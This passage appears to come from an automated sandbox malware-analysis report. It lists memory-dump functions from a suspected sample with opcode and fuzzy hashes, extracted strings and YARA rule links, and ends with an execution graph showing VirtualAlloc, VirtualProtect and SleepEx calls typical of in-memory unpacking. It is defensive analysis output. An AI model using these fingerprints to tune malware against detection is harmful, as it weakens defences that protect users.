                                                                                            • Instruction Fuzzy Hash: FFC0925904F3C12FD303A6302C696942F3228932083CE8ACB99D48B9A7E85A009A8303
                                                                                            Function 00D26814 Relevance: .0, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc42403cfc9e123169807f9e753cc25272a21d0b359b82099c628cc0c5909ff9
                                                                                            • Instruction ID: 99f7c801265487bcf204c280546c0bb74cfa25623dce7855d3bd9c2b43e3c4ca
                                                                                            • Opcode Fuzzy Hash: dc42403cfc9e123169807f9e753cc25272a21d0b359b82099c628cc0c5909ff9
                                                                                            • Instruction Fuzzy Hash: E1C04C3415D164CBD7057B51F91C6A93626E79A308F105058D056366D9CB789905DF24

                                                                                            Non-executed Functions

                                                                                            Function 00D2D228 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$,!p
                                                                                            • API String ID: 0-3887861923
                                                                                            • Opcode ID: 547fdf14083934056b8569f6cc3ba073b5c90a0c2151fe1c84f18bec5a518885
                                                                                            • Instruction ID: d5db27ced49c094e4424efe4c1855ce351d739ae66742aee87af3d2c759ff15d
                                                                                            • Opcode Fuzzy Hash: 547fdf14083934056b8569f6cc3ba073b5c90a0c2151fe1c84f18bec5a518885
                                                                                            • Instruction Fuzzy Hash: 34D13834A00614CFDB14DF68D584AADB7F2FF99318F6984A9E4059B361DB70EC41CB60
                                                                                            Function 00A96858 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 9$F
                                                                                            • API String ID: 0-3131834894
                                                                                            • Opcode ID: 8985654c189604d2de971d663317bd6dacd66cf5fbec51eecec88a0afbd62271
                                                                                            • Instruction ID: 5ed8d6345ac474daff6db15532db393df6eb4871eccf474c10470d62a291a7d1
                                                                                            • Opcode Fuzzy Hash: 8985654c189604d2de971d663317bd6dacd66cf5fbec51eecec88a0afbd62271
                                                                                            • Instruction Fuzzy Hash: 9F3199B1E056198BEB1CCF6B8C4469EFAF7AFC9340F14D1BAC418A6264DB740A818E54
                                                                                            Function 0503E350 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Wzb
                                                                                            • API String ID: 0-2715965760
                                                                                            • Opcode ID: 173f6dedd0649fcc4dc56a1a21ab9c2b4587c592e0d9f82000ed489eced143be
                                                                                            • Instruction ID: 0e90026d9fb04d68c4aa9280b8b1516dc4181ece716a0d7040a444ed003f22a3
                                                                                            • Opcode Fuzzy Hash: 173f6dedd0649fcc4dc56a1a21ab9c2b4587c592e0d9f82000ed489eced143be
                                                                                            • Instruction Fuzzy Hash: B9713E74A05208DFDB64DF29E859BADBBF5BB09300F0085EAE40AA7391DB755980CF01
                                                                                            Function 00D20040 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )
                                                                                            • API String ID: 0-2427484129
                                                                                            • Opcode ID: ee1d6f95c7a1df5edc40ec67f0a66d63e3593c673329b79ca95c6c3463149d51
                                                                                            • Instruction ID: fab8afca9eba6880de9189fff73087be1247f034ea9c16d0e32d4775f746ec91
                                                                                            • Opcode Fuzzy Hash: ee1d6f95c7a1df5edc40ec67f0a66d63e3593c673329b79ca95c6c3463149d51
                                                                                            • Instruction Fuzzy Hash: C6416171D05A588BEB1CCF6B9C4069EFAF7AFC9305F14C1B9840CAA259EB3045428F51
                                                                                            Function 05020040 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: h
                                                                                            • API String ID: 0-2439710439
                                                                                            • Opcode ID: 30cdc0a5ba0437d241e80df85ce0fa5fb94a7a06c60d0f936af67cb9bced9473
                                                                                            • Instruction ID: beb41be32a6790613f2e84ec2a590b7c335478d45b2b9ac2d464bb7b3a1ad7ff
                                                                                            • Opcode Fuzzy Hash: 30cdc0a5ba0437d241e80df85ce0fa5fb94a7a06c60d0f936af67cb9bced9473
                                                                                            • Instruction Fuzzy Hash: 6B311B70E096288BEB29DF5AD95869EB7F7BBC9300F00D0EAD508A7254DB341A858F11
                                                                                            Function 05020006 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: h
                                                                                            • API String ID: 0-2439710439
                                                                                            • Opcode ID: 99f23d9d928b36848744c4f1941fbcfdcaf469a4ca9bd37a71c1cb32411fe832
                                                                                            • Instruction ID: c05b701ff3a924342bd8b2428a7316bb5179bf43c34e6a89338c965d36f60479
                                                                                            • Opcode Fuzzy Hash: 99f23d9d928b36848744c4f1941fbcfdcaf469a4ca9bd37a71c1cb32411fe832
                                                                                            • Instruction Fuzzy Hash: 0F312E71D097558FE72ACF67C859299BBF3AF85300F18C0FAC448A6255EB780A86CF11
                                                                                            Function 00613BD0 Relevance: .6, Instructions: 571COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488752664.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_610000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c503b69200f7f4ed988c59819fceed996324509732ffa55a9e07e75f62041a78
                                                                                            • Instruction ID: 361101187c992629c6c0a2b93a872cbf540773fba6f6ed8df287e5ad6a734236
                                                                                            • Opcode Fuzzy Hash: c503b69200f7f4ed988c59819fceed996324509732ffa55a9e07e75f62041a78
                                                                                            • Instruction Fuzzy Hash: 9A22247054E3C0AFE71397758C69B9A3F759B43314F1A44EBE084DA2E3C6A84889C772
                                                                                            Function 00A9C088 Relevance: .4, Instructions: 431COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f009d6f7215560aaa2078890ee591fb27c8bd0cdeed4e7dccdab1c7f2446ac8
                                                                                            • Instruction ID: 6b91a22ad80dfc8140961962b58c26ed72778e07b44960f0c3a9a319723606ea
                                                                                            • Opcode Fuzzy Hash: 9f009d6f7215560aaa2078890ee591fb27c8bd0cdeed4e7dccdab1c7f2446ac8
                                                                                            • Instruction Fuzzy Hash: A812B271E006588FDB18CFAAC98069DFBF2BF88314F24C569D459EB21AD734A946CF50
                                                                                            Function 00D278E0 Relevance: .4, Instructions: 428COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 310e041b1885a87356158d2dc4d83e3b9c1fa7d0aa19435ded684d9dface79cf
                                                                                            • Instruction ID: 0e7e4d9ba6635295f428694f2640554dc6b15d825032a3bb7b6f110bba6d1645
                                                                                            • Opcode Fuzzy Hash: 310e041b1885a87356158d2dc4d83e3b9c1fa7d0aa19435ded684d9dface79cf
                                                                                            • Instruction Fuzzy Hash: 37121774A09228CFDB24DF69E854BADB7F2BB99304F2080E9D409A7355DB749D85CF20
                                                                                            Function 006408A8 Relevance: .2, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 20f9e90ebb387f0f57750e4a947c95a0fddeab21c8fc70ff20234f3433854d5f
                                                                                            • Instruction ID: 7b826191ff6547dfd1af38d4d1c1e276788527578f3b5bd5d8bfb38e26d1f455
                                                                                            • Opcode Fuzzy Hash: 20f9e90ebb387f0f57750e4a947c95a0fddeab21c8fc70ff20234f3433854d5f
                                                                                            • Instruction Fuzzy Hash: F9A15874E05228CFEB24DF69D494BADB7F2FB8A300F1080A9E219A7395DB745985CF40
                                                                                            Function 00A940F8 Relevance: .2, Instructions: 222COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dd83ad5d85d150bfe92543504770838fde13eb25afa32c6e399e3a334defe505
                                                                                            • Instruction ID: ba2e3574aee84a6180b9e6a2462b19e249bcbe5c1a9f2e1204e32e68752581aa
                                                                                            • Opcode Fuzzy Hash: dd83ad5d85d150bfe92543504770838fde13eb25afa32c6e399e3a334defe505
                                                                                            • Instruction Fuzzy Hash: 0991F2B4E05208CBEF14CFA9D544BEEBBF1BB99304F20816AD119B7240D7794A86DF58
                                                                                            Function 00640C56 Relevance: .2, Instructions: 219COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e3e708d8a87c6576947f17d23f8202532603fb028d3255633e38d0318819eda
                                                                                            • Instruction ID: 8fdedeac619f8917589fb3b419304455f2b6b4f3b30640ea495283d2be17550c
                                                                                            • Opcode Fuzzy Hash: 0e3e708d8a87c6576947f17d23f8202532603fb028d3255633e38d0318819eda
                                                                                            • Instruction Fuzzy Hash: 3A914874E05218CFEB24DF69D484BADB7F2FB8A300F1081A9D219A7395D7745985CF00
                                                                                            Function 00A94108 Relevance: .2, Instructions: 218COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 252971a7d920c920e8d60f0178c6b9136b7f1e7feaf7721505b2ab5b9bf1e518
                                                                                            • Instruction ID: 70e73ba9caba11cf7d5a82ebeb33f690b82fed57802a70b6fa2372e3f4955af7
                                                                                            • Opcode Fuzzy Hash: 252971a7d920c920e8d60f0178c6b9136b7f1e7feaf7721505b2ab5b9bf1e518
                                                                                            • Instruction Fuzzy Hash: 9A81F0B4E05208CBEF14DFA9D544BEEBBF1BB99304F20816AD119B7240D7784A86DB58
                                                                                            Function 0503DEF8 Relevance: .2, Instructions: 208COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fd5e4818f970e6d46a7ec348a19710891844738dfa4b256df9142c4813ea3726
                                                                                            • Instruction ID: 511777061ae2b624a1a284ed93fe5ce7558e915c1e9e2dcc21113af62f4190a6
                                                                                            • Opcode Fuzzy Hash: fd5e4818f970e6d46a7ec348a19710891844738dfa4b256df9142c4813ea3726
                                                                                            • Instruction Fuzzy Hash: 03912A70E05218CFDB64DF65E886BEEBBFABF89300F1481A9D409A7250DB745A85CF41
                                                                                            Function 00AAED30 Relevance: .1, Instructions: 146COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5e4b13504a7a088fdd5e73f97d2e671cffadc70fd81af8218b954cb05829723
                                                                                            • Instruction ID: dfd095148e7bd7ea0925efaefc38539dee3ecd6d249eaa0423bdd377d7b4fed0
                                                                                            • Opcode Fuzzy Hash: c5e4b13504a7a088fdd5e73f97d2e671cffadc70fd81af8218b954cb05829723
                                                                                            • Instruction Fuzzy Hash: 5351B370E05258CFEB24CF9AD944B9DFBF2BB8A300F1490A9D409AB294D7745985CF05
                                                                                            Function 00AAB401 Relevance: .1, Instructions: 145COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be2333699cee68c77050985e46401d2c5d9dd0cb8309f36fa3eebbf10625ecaf
                                                                                            • Instruction ID: 6ec6baf1ad86bd3ab2b527c9ed3765f61d79edb3ebcfc3580a746b3609f36c93
                                                                                            • Opcode Fuzzy Hash: be2333699cee68c77050985e46401d2c5d9dd0cb8309f36fa3eebbf10625ecaf
                                                                                            • Instruction Fuzzy Hash: 02513374D25218DFDB10DFA8E858BEDBBF1FB4A304F10916AE405A7292D7B85985CF10
                                                                                            Function 00AAB410 Relevance: .1, Instructions: 140COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d6cd00d8f209f6d91b1cbbc23bba5e773f7af7c2de953e0d133e1a365d7349a
                                                                                            • Instruction ID: f5c36a373e6adc7f36684a29a78671d9fd4413b65b1c0ddf1df73b58c769c29d
                                                                                            • Opcode Fuzzy Hash: 7d6cd00d8f209f6d91b1cbbc23bba5e773f7af7c2de953e0d133e1a365d7349a
                                                                                            • Instruction Fuzzy Hash: B1512574D25218CFDB10DFA9E858BEDBBF1FB4A304F10916AE409A7286D7B85885CF10
                                                                                            Function 04A70040 Relevance: .1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7027f1cf5eb0de3fb308fa8f3a522ca1d8128534bb51dc31eeed3e43331868f3
                                                                                            • Instruction ID: a576d6e7192b045df1b44c13086dcd325a0c19f6c7b7ab624954b2fe1a2c1422
                                                                                            • Opcode Fuzzy Hash: 7027f1cf5eb0de3fb308fa8f3a522ca1d8128534bb51dc31eeed3e43331868f3
                                                                                            • Instruction Fuzzy Hash: 5E512C71E056688BEB2CCF2B8D546CAFAF3AFC9300F14C1FA954CA6254DB705A818E41
                                                                                            Function 04A7DB88 Relevance: .1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36f1dffcff52afda2b5b340429982347ab3db976bb58e4035cfd72ab3ae06b8e
                                                                                            • Instruction ID: 8d4cbabdfcec8f1961f2980009d2ea2705553a0cafa0e86fe95c9dbc2229971c
                                                                                            • Opcode Fuzzy Hash: 36f1dffcff52afda2b5b340429982347ab3db976bb58e4035cfd72ab3ae06b8e
                                                                                            • Instruction Fuzzy Hash: 2C41C0B4D042489FDB24CFA9D985B9EBFB1BF09304F209429E815BB250D7B4A845CF85
                                                                                            Function 00640AFE Relevance: .1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b85f0280bc31b799e93112eb84d9757097e83eda74788c820bbdb6c0d31edc2d
                                                                                            • Instruction ID: 066b747480be3fce8db2aa170bdb266629c06532c95e177f0562daa26a030ddd
                                                                                            • Opcode Fuzzy Hash: b85f0280bc31b799e93112eb84d9757097e83eda74788c820bbdb6c0d31edc2d
                                                                                            • Instruction Fuzzy Hash: 90217C74908258CFDB20DF68D494BA8BBF2FF4A314F1480EAD50AE7296D7755885CF10
                                                                                            Function 00460CD8 Relevance: .1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488521635.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_460000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f626d3d88ea8434b88a6e082a319d7e8ebda1848bce41546a30435a68111885
                                                                                            • Instruction ID: 71bf6b58b73e80c9a52458902154f11bf936e94aa64c32ec1132039f3a052ab8
                                                                                            • Opcode Fuzzy Hash: 4f626d3d88ea8434b88a6e082a319d7e8ebda1848bce41546a30435a68111885
                                                                                            • Instruction Fuzzy Hash: 1121EFB5D102189FDB14CFA9D884AEEFBF4EB49320F14942AE804B7210D7356904CFA5
                                                                                            Function 00A957C8 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fd7fae679770280984deff48646dd1e8fa3e79fb599fcae0a807c0d454075b0e
                                                                                            • Instruction ID: 2168724596baf15565b5f2d166e769e69ebb15ed041493377f4887a0cf38f454
                                                                                            • Opcode Fuzzy Hash: fd7fae679770280984deff48646dd1e8fa3e79fb599fcae0a807c0d454075b0e
                                                                                            • Instruction Fuzzy Hash: CC219971E056189BEB1CCF6BD9416DEFAF7AFC9310F14C0BAD908A6214DB300A969F44
                                                                                            Function 00A97A04 Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: S$X$c$c,
                                                                                            • API String ID: 0-10682623
                                                                                            • Opcode ID: eca25a29be585b1f33fd0c6f97aa9640dab85aa9812cb65350078337419cdd12
                                                                                            • Instruction ID: cae4cd0291c5af1c1fa1c6766022ff34fd275e4d08c3ee15d5d61bd3cef44031
                                                                                            • Opcode Fuzzy Hash: eca25a29be585b1f33fd0c6f97aa9640dab85aa9812cb65350078337419cdd12
                                                                                            • Instruction Fuzzy Hash: 4521FF74A14229CFDF619F64C898BADBBF5AF05314F2081E9D409A6290DB744EC4CF65
                                                                                            Function 00A987B7 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$a$d$c,
                                                                                            • API String ID: 0-3816431348
                                                                                            • Opcode ID: 4209a823681af3d590043a7ef619e0f87c46dfefbeb86ef7d6b324c6efc6cbd9
                                                                                            • Instruction ID: 29257637ef8bddff6b78b843a65d9589e988eecc07bfdf95261028f58a400ed8
                                                                                            • Opcode Fuzzy Hash: 4209a823681af3d590043a7ef619e0f87c46dfefbeb86ef7d6b324c6efc6cbd9
                                                                                            • Instruction Fuzzy Hash: 28F0DA74A14358CEDF20CF64C884B9D76F0AF46311F141095C54976240DB7489C48B1A

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.6%
                                                                                            Dynamic/Decrypted Code Coverage:71.9%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:64
                                                                                            Total number of Limit Nodes:3
                                                                                            execution_graph 50781 23a64b8 50782 23a64c2 50781->50782 50786 212bf18 50782->50786 50791 212bf08 50782->50791 50783 23a64a2 50787 212bf2d 50786->50787 50796 212bf58 50787->50796 50800 212bf49 50787->50800 50788 212bf43 50788->50783 50792 212bf2d 50791->50792 50794 212bf58 2 API calls 50792->50794 50795 212bf49 2 API calls 50792->50795 50793 212bf43 50793->50783 50794->50793 50795->50793 50798 212bf82 50796->50798 50797 212bfc1 50797->50788 50798->50797 50804 212f847 50798->50804 50802 212bf82 50800->50802 50801 212bfc1 50801->50788 50802->50801 50803 212f847 2 API calls 50802->50803 50803->50802 50805 212f86d 50804->50805 50809 212f710 50805->50809 50813 212f708 50805->50813 50806 212f888 50806->50798 50810 212f754 SleepEx 50809->50810 50812 212f7b4 50810->50812 50812->50806 50814 212f710 SleepEx 50813->50814 50816 212f7b4 50814->50816 50816->50806 50817 44bef08 50818 44bef4c VirtualAlloc 50817->50818 50820 44befb9 50818->50820 50842 2f88c8 50843 2f88d3 50842->50843 50844 2f88f5 50843->50844 50849 44b4cd6 50843->50849 50853 44ba647 50843->50853 50856 44b7a1d 50843->50856 50860 44b244d 50843->50860 50850 44b4cf5 50849->50850 50852 44bd840 VirtualProtect 50850->50852 50851 44b4d1a 50852->50851 50855 44bd840 VirtualProtect 50853->50855 50854 44b01de 50855->50854 50857 44b7a3c 50856->50857 50859 44bd840 VirtualProtect 50857->50859 50858 44b01de 50859->50858 50862 44bd840 VirtualProtect 50860->50862 50861 44b01de 50862->50861 50863 614288 50864 61429b LdrInitializeThunk 50863->50864 50866 6142c3 50864->50866 50821 14d048 50822 14d060 50821->50822 50823 14d0bb 50822->50823 50825 44be428 50822->50825 50826 44be481 50825->50826 50829 44be9b8 50826->50829 50827 44be4b6 50830 44be9e5 50829->50830 50833 44beb7b 50830->50833 50834 44bd840 50830->50834 50833->50827 50836 44bd867 50834->50836 50838 44bdd40 50836->50838 50839 44bdd89 VirtualProtect 50838->50839 50841 44bd924 50839->50841 50841->50827

                                                                                            Executed Functions

                                                                                            Function 0069D980 Relevance: 19.4, Strings: 15, Instructions: 618COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 69d980-69d9a1 1 69d9a8-69da38 call 69e4f6 0->1 2 69d9a3 0->2 7 69da3e-69da8b 1->7 2->1 10 69da9a 7->10 11 69da8d-69da98 7->11 12 69daa4-69dbbf 10->12 11->12 23 69dbd1-69dbfc 12->23 24 69dbc1-69dbc7 12->24 25 69e3c8-69e3e4 23->25 24->23 26 69e3ea-69e405 25->26 27 69dc01-69dd64 call 69c798 25->27 38 69dd76-69df0b call 699f18 call 699df0 27->38 39 69dd66-69dd6c 27->39 51 69df0d-69df11 38->51 52 69df70-69df7a 38->52 39->38 53 69df19-69df6b 51->53 54 69df13-69df14 51->54 55 69e1a1-69e1c0 52->55 56 69e246-69e2b1 53->56 54->56 57 69df7f-69e0c5 call 69c798 55->57 58 69e1c6-69e1f0 55->58 75 69e2c3-69e30e 56->75 76 69e2b3-69e2b9 56->76 87 69e0cb-69e197 call 69c798 57->87 88 69e19a-69e19b 57->88 64 69e243-69e244 58->64 65 69e1f2-69e240 58->65 64->56 65->64 78 69e3ad-69e3c5 75->78 79 69e314-69e3ac 75->79 76->75 78->25 79->78 87->88 88->55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: f"p$8$lC$lC$lC$lC$lC$xC$xC$xC$C$C$C$C$cV
                                                                                            • API String ID: 0-1429672992
                                                                                            • Opcode ID: 5a881f067ad7dd6922e5dec47dc76b08c5a2f2b4729166ef24ae46bcbd661f64
                                                                                            • Instruction ID: efb225e20a0ad62526dd9aa21d1030ccd369c3665adfc04882581be7754c6097
                                                                                            • Opcode Fuzzy Hash: 5a881f067ad7dd6922e5dec47dc76b08c5a2f2b4729166ef24ae46bcbd661f64
                                                                                            • Instruction Fuzzy Hash: 5952C575E006288FDB65DF68C850AD9B7B2FF99300F5082AAD819B7355DB30AE85CF50
                                                                                            Function 0069D970 Relevance: 7.7, Strings: 6, Instructions: 169COMMON
                                                                                            Download Yara Rule

